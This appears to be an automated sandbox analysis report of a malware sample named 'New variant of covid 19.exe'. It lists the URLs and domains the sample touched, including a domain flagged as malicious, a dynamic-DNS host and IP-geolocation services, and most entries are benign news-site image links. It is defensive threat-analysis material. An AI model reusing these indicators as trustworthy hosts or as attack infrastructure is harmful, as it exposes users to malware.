https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02- | 0% | Avira URL Cloud | safe
https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-11837 | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690 | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803. | 0% | Avira URL Cloud | safe
http://liverpoolofcfanclub.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-62D0D2B15CF140C87AEA01E41DD7046D.html | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03- | 0% | Avira URL Cloud | safe
https://www.liverpool.com/all-about/premier-league | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03- | 0% | Avira URL Cloud | safe
https://www.liverpool.com/liverpool-fc-news/ | 0% | Avira URL Cloud | safe
https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154 | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837. | 0% | Avira URL Cloud | safe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850 | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-02 | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png | 0% | Avira URL Cloud | safe
https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876 | 0% | Avira URL Cloud | safe
http://schemas.datacontract.org/2004/07/ | 0% | URL Reputation | safe
http://schemas.datacontract.org/2004/07/ | 0% | URL Reputation | safe
http://schemas.datacontract.org/2004/07/ | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg | 0% | Avira URL Cloud | safe
https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-1996166 | 0% | Avira URL Cloud | safe
https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst | 0% | Avira URL Cloud | safe
https://reachplc.hub.loginradius.com" | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03- | 0% | Avira URL Cloud | safe
http://liverpoolofcfanclub.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-75F90208612A44FA7B0856621DD5DF3A.html | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818. | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-1273716690 | 0% | Avira URL Cloud | safe
https://s2-prod.liverpool.com | 0% | Avira URL Cloud | safe
https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816 | 0% | Avira URL Cloud | safe
https://%s.xboxlive.com | 0% | URL Reputation | safe
https://%s.xboxlive.com | 0% | URL Reputation | safe
https://%s.xboxlive.com | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-1231353837 | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com | 0% | Avira URL Cloud | safe
https://felix.data.tm-awx.com/felix.min.js | 0% | Avira URL Cloud | safe
https://dynamic.t | 0% | URL Reputation | safe
https://dynamic.t | 0% | URL Reputation | safe
https://dynamic.t | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpg | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03- | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s270b/0_RobertsonCross1.jpg | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s458/0_GettyImages-1273716690. | 0% | Avira URL Cloud | safe
https://www.liverpool.com/all-about/ozan-kabak | 0% | Avira URL Cloud | safe
https://s2-prod.mirror.co.uk/ | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-02- | 0% | Avira URL Cloud | safe
https://www.liverpool.com/all-about/champions-league | 0% | Avira URL Cloud | safe
https://www.liverpool.com/all-about/curtis-jones | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03- | 0% | Avira URL Cloud | safe
https://www.liverpool.com/all-about/steven-gerrard | 0% | Avira URL Cloud | safe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-19954616 | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s458/1_WhatsApp-Image-2021-03- | 0% | Avira URL Cloud | safe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-penalties-premier-league-var-17171391 | 0% | Avira URL Cloud | safe
https://www.liverpool.com/schedule/ | 0% | Avira URL Cloud | safe
http://liverpoolofcfanclub.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-59F952AF6E65CA37DF9A6DD24C3AD6F0.html | 0% | Avira URL Cloud | safe
https://s2-prod.liverpool.com/ | 0% | Avira URL Cloud | safe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-champions-league-jurgen-klopp-1996194 | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s220b/0_GettyImages-1231353837 | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s458/0_GettyImages-1302496803. | 0% | Avira URL Cloud | safe
https://felix.data.tm-awx.com/ampconfig.json" | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s615/0_GettyImages-1273716690. | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s270b/0_Salah-Pressing.jpg | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s615/0_Salah-Goal-vs-Leeds.jpg | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s270b/0_WhatsApp-Image-2021-02 | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s220b/0_RobertsonCross1.jpg | 0% | Avira URL Cloud | safe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-andy-robertson-valuable-quality-19946 | 0% | Avira URL Cloud | safe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-1993836 | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s615/0_Salah-Pressing.jpg | 0% | Avira URL Cloud | safe

      Domains and IPs

      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
ip-api.com | 208.95.112.1 | true | false | - | high
liverpoolofcfanclub.com | 104.21.31.39 | true | true | - | unknown
devils.shacknet.us | 103.28.70.164 | true | false | - | unknown

        Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://liverpoolofcfanclub.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-62D0D2B15CF140C87AEA01E41DD7046D.html | true | Avira URL Cloud: safe | unknown
http://liverpoolofcfanclub.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-75F90208612A44FA7B0856621DD5DF3A.html | true | Avira URL Cloud: safe | unknown
http://liverpoolofcfanclub.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-59F952AF6E65CA37DF9A6DD24C3AD6F0.html | true | Avira URL Cloud: safe | unknown

        URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818. | New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://dev.ditu.live.com/REST/v1/Routes/ | svchost.exe, 0000001B.00000002.311128902.000002237723D000.00000004.00000001.sdmp | false | - | high
https://t0.tiles.ditu.live.com/tiles/gen | svchost.exe, 0000001B.00000003.309882014.000002237724E000.00000004.00000001.sdmp | false | - | high
https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg | New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://c.amazon-adsystem.com/aax2/apstag.js | New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmp | false | - | high
https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668 | svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://dev.virtualearth.net/REST/v1/Routes/Walking | svchost.exe, 0000001B.00000003.309958248.0000022377260000.00000004.00000001.sdmp | false | - | high
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02- | New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-11837 | svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690 | New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803. | New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/ | svchost.exe, 0000001B.00000003.310012576.0000022377249000.00000004.00000001.sdmp | false | - | high
https://dev.virtualearth.net/REST/v1/Transit/Schedules/ | svchost.exe, 0000001B.00000002.311156508.0000022377242000.00000004.00000001.sdmp | false | - | high
https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp | New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03- | New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://www.liverpool.com/all-about/premier-league | svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg | New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png | New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03- | New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://www.liverpool.com/liverpool-fc-news/ | svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154 | New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://ip-api.com | New variant of covid 19.exe, 0000000A.00000002.744575828.0000000002F31000.00000004.00000001.sdmp | false | - | high
https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837. | New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850 | svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://api.ipify.org/ | New variant of covid 19.exe, 0000000A.00000002.737784433.0000000000402000.00000040.00000001.sdmp | false | - | high
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-02 | New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://appexmapsappupdate.blob.core.windows.net | svchost.exe, 0000001B.00000003.309958248.0000022377260000.00000004.00000001.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | New variant of covid 19.exe, 0000000A.00000002.744575828.0000000002F31000.00000004.00000001.sdmp | false | - | high
http://www.bingmapsportal.com | svchost.exe, 0000001B.00000002.311005148.0000022377213000.00000004.00000001.sdmp | false | - | high
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg | New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://ads.pubmatic.com/AdServer/js/pwt/156997/3236/pwt.js | New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmp | false | - | high
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png | New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876 | svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://freegeoip.net/xml/ | New variant of covid 19.exe, 0000000A.00000002.737784433.0000000000402000.00000040.00000001.sdmp | false
                                  high
                                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 0000001B.00000003.310135786.0000022377245000.00000004.00000001.sdmpfalse
                                    high
                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000022.00000002.413593519.0000000004CB2000.00000004.00000001.sdmpfalse
                                      high
                                      http://schemas.datacontract.org/2004/07/New variant of covid 19.exe, 0000000A.00000002.744882535.0000000002F6A000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 0000001B.00000002.311128902.000002237723D000.00000004.00000001.sdmpfalse
                                        high
                                        https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpgNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-1996166svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorstsvchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://reachplc.hub.loginradius.com&quot;New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        low
                                        https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.pngNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-1273716690New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://s2-prod.liverpool.comsvchost.exe, 00000011.00000003.281475012.000000000393A000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 0000001B.00000002.311128902.000002237723D000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.311005148.0000022377213000.00000004.00000001.sdmpfalse
                                          high
                                          https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://%s.xboxlive.comsvchost.exe, 00000018.00000002.739177943.0000017126845000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          low
                                          https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 0000001B.00000003.287773862.0000022377231000.00000004.00000001.sdmpfalse
                                            high
                                            https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000001B.00000003.287773862.0000022377231000.00000004.00000001.sdmpfalse
                                              high
                                              https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-1231353837New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://i2-prod.liverpool.comsvchost.exe, 00000011.00000003.281475012.000000000393A000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://felix.data.tm-awx.com/felix.min.jsNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://dynamic.tsvchost.exe, 0000001B.00000003.310012576.0000022377249000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpgNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 0000001B.00000003.309958248.0000022377260000.00000004.00000001.sdmpfalse
                                                high
                                                https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s270b/0_RobertsonCross1.jpgNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s458/0_GettyImages-1273716690.svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.liverpool.com/all-about/ozan-kabakNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000022.00000002.413593519.0000000004CB2000.00000004.00000001.sdmpfalse
                                                  high
                                                  https://s2-prod.mirror.co.uk/svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-02-New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.liverpool.com/all-about/champions-leaguesvchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.liverpool.com/all-about/curtis-jonesNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 0000001B.00000002.311281205.000002237725C000.00000004.00000001.sdmpfalse
                                                    high
                                                    https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.liverpool.com/all-about/steven-gerrardNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 0000001B.00000003.310012576.0000022377249000.00000004.00000001.sdmpfalse
                                                      high
                                                      https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-19954616svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s458/1_WhatsApp-Image-2021-03-New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
